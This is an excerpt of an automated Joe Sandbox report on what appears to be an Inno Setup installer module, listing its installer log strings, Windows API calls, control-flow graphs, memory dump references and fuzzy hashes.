                                          • Same time stamp. Skipping., xrefs: 0046925E
                                          • Version of existing file: (none), xrefs: 00469203
                                          • -- File entry --, xrefs: 00468C7B
                                          • Time stamp of our file: (failed to read), xrefs: 00468EB9
                                          • Failed to strip read-only attribute., xrefs: 004693DC
                                          • Failed to read existing file's MD5 sum. Proceeding., xrefs: 004691D9
                                          • Dest file exists., xrefs: 00468ECD
                                          • , xrefs: 004690E1, 004692A9, 00469327
                                          • Incrementing shared file count (32-bit)., xrefs: 00469A37
                                          • Same version. Skipping., xrefs: 004691EE
                                          • Version of our file: (none), xrefs: 0046900E
                                          • User opted not to overwrite the existing file. Skipping., xrefs: 00469356
                                          • InUn, xrefs: 0046964E
                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 00469403
                                          • Dest file is protected by Windows File Protection., xrefs: 00468DFF
                                          • Existing file's MD5 sum matches our file. Skipping., xrefs: 004691BE
                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0046908E
                                          • Dest filename: %s, xrefs: 00468DCD
                                          • Time stamp of existing file: (failed to read), xrefs: 00468F49
                                          • Existing file is a newer version. Skipping., xrefs: 00469114
                                          • Time stamp of our file: %s, xrefs: 00468EAD
                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 004692F5
                                          • Existing file's MD5 sum is different from our file. Proceeding., xrefs: 004691CD
                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 00468EE0
                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046939F
                                          • Will register the file (a type library) later., xrefs: 004699A5
                                          • @, xrefs: 00468D28
                                          • Stripped read-only attribute., xrefs: 004693D0
                                          • Version of our file: %u.%u.%u.%u, xrefs: 00469002
                                          • Existing file has a later time stamp. Skipping., xrefs: 004692D8
                                          • Couldn't read time stamp. Skipping., xrefs: 0046923E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Time$File$Local$CloseFindFullNamePathQuerySystemValue
                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                          • API String ID: 2131814033-2710193735
                                          • Opcode ID: 6e3a96cfeceefe7b27e12024ddd28e240c815b03a9fa938ebaff2c66f8be18b2
                                          • Instruction ID: 26ed265d38906795b16b4e49dacc61d4c42806bb9d11969e3a6df92dda3e5e8a
                                          • Opcode Fuzzy Hash: 6e3a96cfeceefe7b27e12024ddd28e240c815b03a9fa938ebaff2c66f8be18b2
                                          • Instruction Fuzzy Hash: CF826230E042489FDF11DFA5C985BDDBBB5AF05304F1440ABE844AB392E7B99E45CB1A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1675 423cd4-423d08 1676 423d0a-423d0b 1675->1676 1677 423d3c-423d53 call 423c30 1675->1677 1679 423d0d-423d29 call 40b504 1676->1679 1682 423db4-423db9 1677->1682 1683 423d55 1677->1683 1702 423d2b-423d33 1679->1702 1703 423d38-423d3a 1679->1703 1685 423dbb 1682->1685 1686 423def-423df4 1682->1686 1687 423d5b-423d5e 1683->1687 1688 423e18-423e28 1683->1688 1692 423dc1-423dc9 1685->1692 1693 424079-424081 1685->1693 1696 424162-424170 IsIconic 1686->1696 1697 423dfa-423dfd 1686->1697 1694 423d60 1687->1694 1695 423d8d-423d90 1687->1695 1690 423e33-423e3b call 42425c 1688->1690 1691 423e2a-423e2f 1688->1691 1699 42421a-424222 1690->1699 1704 423e40-423e48 call 4242a4 1691->1704 1705 423e31-423e54 call 423c4c 1691->1705 1707 423fdb-424002 SendMessageA 1692->1707 1708 423dcf-423dd4 1692->1708 1698 424087-424092 call 4182a8 1693->1698 1693->1699 1710 423d66-423d69 1694->1710 1711 423ebe-423ece call 423c4c 1694->1711 1700 423e71-423e78 1695->1700 1701 423d96-423d97 1695->1701 1696->1699 1709 424176-424181 GetFocus 1696->1709 1712 423e03-423e04 1697->1712 1713 42419e-4241b3 call 424918 1697->1713 1698->1699 1763 424098-4240a7 call 4182a8 IsWindowEnabled 1698->1763 1714 424239-42423f 1699->1714 1700->1699 1723 423e7e-423e85 1700->1723 1724 424007-42400e 1701->1724 1725 423d9d-423da0 1701->1725 1702->1714 1703->1677 1703->1679 1704->1699 1705->1699 1707->1699 1726 424112-42411d 1708->1726 1727 423dda-423ddb 1708->1727 1709->1699 1718 424187-424190 call 41f0bc 1709->1718 1719 423ee6-423f02 PostMessageA call 423c4c 1710->1719 1720 423d6f-423d72 1710->1720 1711->1699 1729 4241b5-4241bc 1712->1729 1730 423e0a-423e0d 1712->1730 1713->1699 1718->1699 1776 424196-42419c SetFocus 1718->1776 1719->1699 1736 423d78-423d7b 1720->1736 1737 423f6d-423f74 1720->1737 1723->1699 1742 423e8b-423e91 1723->1742 1724->1699 1732 424014-424019 call 404fa4 1724->1732 1743 423da6-423da9 1725->1743 1744 423f07-423f27 call 423c4c 1725->1744 1726->1699 1748 424123-424135 1726->1748 1745 423de1-423de4 1727->1745 1746 42413a-424145 1727->1746 1739 4241d3-4241e6 call 4245f4 1729->1739 1740 4241be-4241d1 call 42459c 1729->1740 1749 423e13 1730->1749 1750 4241e8-4241ef 1730->1750 1732->1699 1758 423d81-423d82 1736->1758 1759 423e96-423ea4 IsIconic 1736->1759 1760 423f76-423f89 call 423bdc 1737->1760 1761 423fa7-423fb8 call 423c4c 1737->1761 1739->1699 1740->1699 1742->1699 1764 423ed3-423ee1 call 424240 1743->1764 1765 423daf 1743->1765 1790 423f4b-423f68 call 423b4c PostMessageA 1744->1790 1791 423f29-423f46 call 423bdc PostMessageA 1744->1791 1769 423dea 1745->1769 1770 42401e-424026 1745->1770 1746->1699 1752 42414b-42415d 1746->1752 1748->1699 1751 424213-424214 call 423c4c 1749->1751 1767 424202-424211 1750->1767 1768 4241f1-424200 1750->1768 1799 424219 1751->1799 1752->1699 1777 423d88 1758->1777 1778 423e59-423e61 1758->1778 1784 423eb2-423eb9 call 423c4c 1759->1784 1785 423ea6-423ead call 423c88 1759->1785 1804 423f9b-423fa2 call 423c4c 1760->1804 1805 423f8b-423f95 call 41f020 1760->1805 1809 423fba-423fc8 call 41ef6c 1761->1809 1810 423fce-423fd6 call 423b4c 1761->1810 1763->1699 1806 4240ad-4240bc call 4182a8 IsWindowVisible 1763->1806 1764->1699 1765->1751 1767->1699 1768->1699 1769->1751 1770->1699 1775 42402c-424033 1770->1775 1775->1699 1792 424039-424048 call 4182a8 IsWindowEnabled 1775->1792 1776->1699 1777->1751 1778->1699 1793 423e67-423e6c call 422d14 1778->1793 1784->1699 1785->1699 1790->1699 1791->1699 1792->1699 1821 42404e-424064 call 4123d8 1792->1821 1793->1699 1799->1699 1804->1699 1805->1804 1806->1699 1827 4240c2-42410d GetFocus call 4182a8 SetFocus call 415308 SetFocus 1806->1827 1809->1810 1810->1699 1821->1699 1830 42406a-424074 1821->1830 1827->1699 1830->1699
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e909df29738598a04013bb39bd27b24a383e67e3b68f24d36dbb0c3175277ce
                                          • Instruction ID: b4035ffc14ca3d091803c165bcf49985a0577d761eaa36a67f266a584e3b78e4
                                          • Opcode Fuzzy Hash: 0e909df29738598a04013bb39bd27b24a383e67e3b68f24d36dbb0c3175277ce
                                          • Instruction Fuzzy Hash: C2E15D30700124EFDB14DF9AE585A5AB7B0EB48345F9580AAF409DB353C63CEE42DB29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1996 461280-461296 1997 4612a0-461357 call 420274 call 402c78 * 6 1996->1997 1998 461298-46129b call 402e78 1996->1998 2015 461394-4613ad 1997->2015 2016 461359-461380 call 414704 1997->2016 1998->1997 2022 4613af-4613d6 call 4146e4 2015->2022 2023 4613ea-4613f8 call 488670 2015->2023 2020 461385-46138f call 4146c4 2016->2020 2021 461382 2016->2021 2020->2015 2021->2020 2031 4613db-4613e5 call 4146a4 2022->2031 2032 4613d8 2022->2032 2029 4613fa-461409 call 488530 2023->2029 2030 46140b-46140d call 488654 2023->2030 2037 461412-461465 call 48811c call 41a498 * 2 2029->2037 2030->2037 2031->2023 2032->2031 2044 461476-46148b call 450b18 call 414be0 2037->2044 2045 461467-461474 call 414be0 2037->2045 2050 461490-461497 2044->2050 2045->2050 2052 4614df-461965 call 488490 call 48872c call 4146e4 * 3 call 414784 call 4146a4 * 3 call 45ba50 call 45ba68 call 45ba74 call 45babc call 45ba50 call 45ba68 call 45ba74 call 45babc call 45ba68 call 45babc LoadBitmapA call 41d778 call 45ba8c call 45baa4 call 4610dc call 462af4 call 460724 call 4036c4 call 414be0 call 460a5c call 460a8c call 460724 call 4036c4 * 2 call 414be0 call 462af4 call 460724 call 414be0 call 460a5c call 460a8c call 414be0 * 2 call 462af4 call 414be0 * 2 call 460a5c call 4146c4 call 460a5c call 4146c4 call 462af4 call 414be0 call 460a5c call 460a8c call 462af4 call 414be0 call 460a5c call 4146c4 * 2 call 414be0 call 460a5c call 4146c4 2050->2052 2053 461499-4614da call 414784 call 4147c8 call 421060 call 42108c call 420c30 call 420c5c 2050->2053 2183 461967-4619bf call 4146c4 call 414be0 call 460a5c call 4146c4 2052->2183 2184 4619c1-4619da call 414b0c * 2 2052->2184 2053->2052 2192 4619df-461a90 call 460724 call 462af4 call 460724 call 414be0 call 48872c call 460a5c 2183->2192 2184->2192 2210 461a92-461aad 2192->2210 2211 461aca-461cf1 call 460724 call 414be0 call 48873c * 2 call 42e6c8 call 4146c4 call 460a5c call 4146c4 call 414be0 call 488490 call 48872c call 4146e4 call 460724 call 414be0 call 460a5c call 4146c4 call 460724 call 462af4 call 460724 call 414be0 call 460a5c call 4146c4 call 460a8c call 460724 call 414be0 call 460a5c 2192->2211 2212 461ab2-461ac5 call 4146c4 2210->2212 2213 461aaf 2210->2213 2268 461d32-461deb call 460724 call 462af4 call 460724 call 414be0 call 48872c call 460a5c 2211->2268 2269 461cf3-461cfc 2211->2269 2212->2211 2213->2212 2287 461e25-462251 call 460724 call 414be0 call 48873c * 2 call 42e6c8 call 4146c4 call 460a5c call 4146c4 call 414be0 call 488490 call 48872c call 4146e4 call 414be0 call 460724 call 462af4 call 460724 call 414be0 call 460a5c call 460a8c call 42bc98 call 48873c call 44e694 call 460724 call 462af4 call 460724 call 462af4 call 460724 call 462af4 * 2 call 414be0 call 460a5c call 460a8c call 462af4 call 48811c call 41a498 call 460724 call 4036c4 call 414be0 call 460a5c call 4146c4 call 414be0 * 2 call 48873c call 4035dc call 4036c4 * 2 call 414be0 2268->2287 2288 461ded-461e08 2268->2288 2269->2268 2270 461cfe-461d2d call 414b0c call 460a8c 2269->2270 2270->2268 2387 462275-46227c 2287->2387 2388 462253-462270 call 44fa68 call 44fb9c 2287->2388 2289 461e0d-461e20 call 4146c4 2288->2289 2290 461e0a 2288->2290 2289->2287 2290->2289 2389 4622a0-4622a7 2387->2389 2390 46227e-46229b call 44fa68 call 44fb9c 2387->2390 2388->2387 2393 4622cb-462318 call 4182a8 GetSystemMenu AppendMenuA call 403880 AppendMenuA call 462be8 2389->2393 2394 4622a9-4622c6 call 44fa68 call 44fb9c 2389->2394 2390->2389 2408 4623c1-4623c8 2393->2408 2409 46231e-462327 2393->2409 2394->2393 2412 4623ce-4623f1 call 471af8 call 403598 2408->2412 2413 46245c-46246a call 414be0 2408->2413 2410 462382-4623bc call 414be0 * 3 2409->2410 2411 462329-462380 call 471af8 call 414be0 call 471af8 call 414be0 call 471af8 call 414be0 2409->2411 2410->2408 2411->2408 2437 462403-462417 call 4035dc 2412->2437 2438 4623f3-462401 call 4035dc 2412->2438 2421 46246f-462478 2413->2421 2425 46247e-462496 call 42a0a0 2421->2425 2426 46251a-462539 2421->2426 2440 4624f3-4624f7 2425->2440 2441 462498-46249c 2425->2441 2429 46257d-4625ac call 42ba34 call 44e620 2426->2429 2430 46253b-46253f 2426->2430 2465 462642-46264e 2429->2465 2466 4625b2-4625b6 2429->2466 2435 462541-462561 call 40b504 call 4300a4 2430->2435 2474 462577-46257b 2435->2474 2475 462563-462571 2435->2475 2456 462429-46245a call 42c81c call 42cbc4 call 4035dc call 414be0 2437->2456 2457 462419-462424 call 4035dc 2437->2457 2438->2456 2453 46250b-462515 call 42a124 2440->2453 2454 4624f9-462509 call 42a124 2440->2454 2449 46249e-4624e8 call 40b504 call 471af8 call 406b20 2441->2449 2517 4624ed-4624f1 2449->2517 2518 4624ea 2449->2518 2453->2426 2454->2426 2456->2421 2457->2456 2482 462650-462666 call 46349c 2465->2482 2483 4626ba-4626be 2465->2483 2471 4625b8-4625ca call 40b504 2466->2471 2490 4625fc-462633 call 471af8 call 44c780 2471->2490 2491 4625cc-4625fa call 471af8 call 44c850 2471->2491 2474->2429 2474->2435 2475->2474 2494 462757-46276c call 460e3c call 460ba8 2482->2494 2505 46266c-462677 2482->2505 2487 4626c0-4626d7 call 40b504 2483->2487 2488 46272f-462738 2483->2488 2511 46270f-46272d call 40b504 call 463524 2487->2511 2512 4626d9-46270d call 40b504 call 463524 call 46349c 2487->2512 2488->2494 2495 46273a-462752 call 40b504 call 463524 2488->2495 2526 462638-46263c 2490->2526 2491->2526 2532 4627be-4627c8 call 414b0c 2494->2532 2533 46276e-462791 call 42a108 call 40b504 2494->2533 2495->2494 2505->2494 2514 46267d-462681 2505->2514 2511->2494 2512->2494 2523 462683-462699 call 40b504 2514->2523 2517->2440 2517->2449 2518->2517 2539 4626af-4626b3 2523->2539 2540 46269b-4626aa call 42a124 2523->2540 2526->2465 2526->2471 2542 4627cd-4627ec call 414b0c 2532->2542 2555 462793-46279a 2533->2555 2556 46279c-4627ab call 414b0c 2533->2556 2539->2523 2546 4626b5 2539->2546 2540->2494 2553 462816-462839 call 471af8 call 403598 2542->2553 2554 4627ee-462811 call 42a108 call 4636b4 2542->2554 2546->2494 2569 462854-46285d 2553->2569 2570 46283b-462842 2553->2570 2554->2553 2555->2556 2558 4627ad-4627bc call 414b0c 2555->2558 2556->2542 2558->2542 2572 462873-462883 call 4035dc 2569->2572 2573 46285f-462871 call 4037cc 2569->2573 2570->2569 2571 462844-462852 call 4035dc 2570->2571 2580 462895-4628ac call 414be0 2571->2580 2572->2580 2573->2572 2581 462885-462890 call 4035dc 2573->2581 2585 4628e2-4628ec call 414b0c 2580->2585 2586 4628ae-4628b5 2580->2586 2581->2580 2592 4628f1-46291f call 403548 * 3 2585->2592 2587 4628b7-4628c0 2586->2587 2588 4628c2-4628cc call 42b1ac 2586->2588 2587->2588 2590 4628d1-4628e0 call 414b0c 2587->2590 2588->2590 2590->2592
                                          APIs
                                            • Part of subcall function 00488530: GetWindowRect.USER32 ref: 00488546
                                          • LoadBitmapA.USER32 ref: 0046164F
                                            • Part of subcall function 0041D778: GetObjectA.GDI32(?,00000018,?), ref: 0041D7A3
                                            • Part of subcall function 004610DC: SHGetFileInfo.SHELL32([rG,00000010,?,00000160,00001010), ref: 00461179
                                            • Part of subcall function 004610DC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046119F
                                            • Part of subcall function 004610DC: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 004611FB
                                            • Part of subcall function 004610DC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00461221
                                            • Part of subcall function 00460A8C: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00461704,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00460AA4
                                            • Part of subcall function 0048873C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00488746
                                            • Part of subcall function 00488490: 72E5AC50.USER32(00000000,?,?,?), ref: 004884B0
                                            • Part of subcall function 00488490: SelectObject.GDI32(?,00000000), ref: 004884D3
                                            • Part of subcall function 00488490: 72E5B380.USER32(00000000,?,00488523,0048851C,?,00000000,?,?,?), ref: 00488516
                                            • Part of subcall function 0048872C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00488736
                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021F9654,021FB27C,?,?,021FB2AC,?,?,021FB2FC,?), ref: 004622D5
                                          • AppendMenuA.USER32 ref: 004622E6
                                          • AppendMenuA.USER32 ref: 004622FE
                                            • Part of subcall function 0042A124: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A13A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Menu$AppendExtractFileIconInfoObject$B380BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                          • String ID: $(Default)$STOPIMAGE$[rG
                                          • API String ID: 3668695379-3431441485
                                          • Opcode ID: 982b526855ebd0df1b8752aac8a3729627e6a5dcf2e6983e687b878e04c3e5a3
                                          • Instruction ID: d5e5c569bf6f5c9efe25e75cdb34261cfe5831a07cd567faab00c28eae44b740
                                          • Opcode Fuzzy Hash: 982b526855ebd0df1b8752aac8a3729627e6a5dcf2e6983e687b878e04c3e5a3
                                          • Instruction Fuzzy Hash: D1F2C5786005118FCB00EB69C5D9F9A73F1BF8A304F1581A6E9049B36AD778EC46CF5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: LongWindow$Prop
                                          • String ID:
                                          • API String ID: 3887896539-0
                                          • Opcode ID: 97bfe80bf8ee61432f76a670240df73225b07710b5e5d004723aad7e8a8e2c71
                                          • Instruction ID: 55001cc95f3aa9d9a1c45ff4a94f0120d729eeb625f187ff4b383852b5e02246
                                          • Opcode Fuzzy Hash: 97bfe80bf8ee61432f76a670240df73225b07710b5e5d004723aad7e8a8e2c71
                                          • Instruction Fuzzy Hash: B2120EA148E3C05FE7278B74896A5D07F60EE1332571941DFC5C28F1A3D61D8A8BC76A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,00474C10), ref: 00474A74
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474ABD
                                          • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474ACA
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474B16
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00474BE3,?,00000000,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474BBF
                                          • FindClose.KERNEL32(000000FF,00474BEA,00474BE3,?,00000000,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474BDD
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: 23f3463f48b63caa86debf7b542b8fc010e328c30f9e1a37102d144d0df4a682
                                          • Instruction ID: 6d75daa855672c9e67831e63b57356653e92e783bb5012b3bdaf98fb221fdef6
                                          • Opcode Fuzzy Hash: 23f3463f48b63caa86debf7b542b8fc010e328c30f9e1a37102d144d0df4a682
                                          • Instruction Fuzzy Hash: 16515F71900658AFCB21DF65CC45AEEB7BCEB88315F1084AAA408E7381D7389F85CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046CBBA,?,?,00000001,004AE064), ref: 0046CAC1
                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,0046CBBA,?,?,00000001,004AE064), ref: 0046CB86
                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,0046CBBA,?,?,00000001,004AE064), ref: 0046CB94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID: unins$unins???.*
                                          • API String ID: 3541575487-1009660736
                                          • Opcode ID: d700b9c545a9994b5c3b730b0a7a978ab037565f1b3ba8acce1da6d75ab2e347
                                          • Instruction ID: bd5d868bda387e2be4f3073c311abf9aee2bd974f87f11138952fbe5140f0b69
                                          • Opcode Fuzzy Hash: d700b9c545a9994b5c3b730b0a7a978ab037565f1b3ba8acce1da6d75ab2e347
                                          • Instruction Fuzzy Hash: 193195705001489FDB10DF65C9D2AEEB7B8EF05714F1044F6E848E72A1EA38AF419F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040B0AA
                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B207,00000000,0040B21F,?,?,?,?), ref: 0040B0BB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Resource$FindFree
                                          • String ID:
                                          • API String ID: 4097029671-0
                                          • Opcode ID: 50f5a74460d3a176a6f977901a7d044a6d0dfa0e12ce65c2d3060087e560ba68
                                          • Instruction ID: 2948fd6ecb2bac01dbc7c626b87b6ef8ebd01b03295fe5e1d9ce21df9001b452
                                          • Opcode Fuzzy Hash: 50f5a74460d3a176a6f977901a7d044a6d0dfa0e12ce65c2d3060087e560ba68
                                          • Instruction Fuzzy Hash: 5D01F271704700AFEB00EF65DC62A2A77ADDB49758B10807AF500AB3C1DA79AC0196AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004515DF,?,?,-00000001,00000000), ref: 004515B9
                                          • GetLastError.KERNEL32(00000000,?,00000000,004515DF,?,?,-00000001,00000000), ref: 004515C1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorFileFindFirstLast
                                          • String ID:
                                          • API String ID: 873889042-0
                                          • Opcode ID: 76bad61bc4f0af6580115bd8f885e78bebf0608dca1d0fd797f93b2829e49932
                                          • Instruction ID: 2b761596f2c387da0a8c0b3962020352b440c1ec696bd3da55d5cac075a31bc0
                                          • Opcode Fuzzy Hash: 76bad61bc4f0af6580115bd8f885e78bebf0608dca1d0fd797f93b2829e49932
                                          • Instruction Fuzzy Hash: 6AF0F931A04608BB8B10DBAA9C4159EF7ACDBC5735B5047BBFC14E36A2EA3C5E04855C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,004086C7,?,00000000,004087A6), ref: 0040861A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
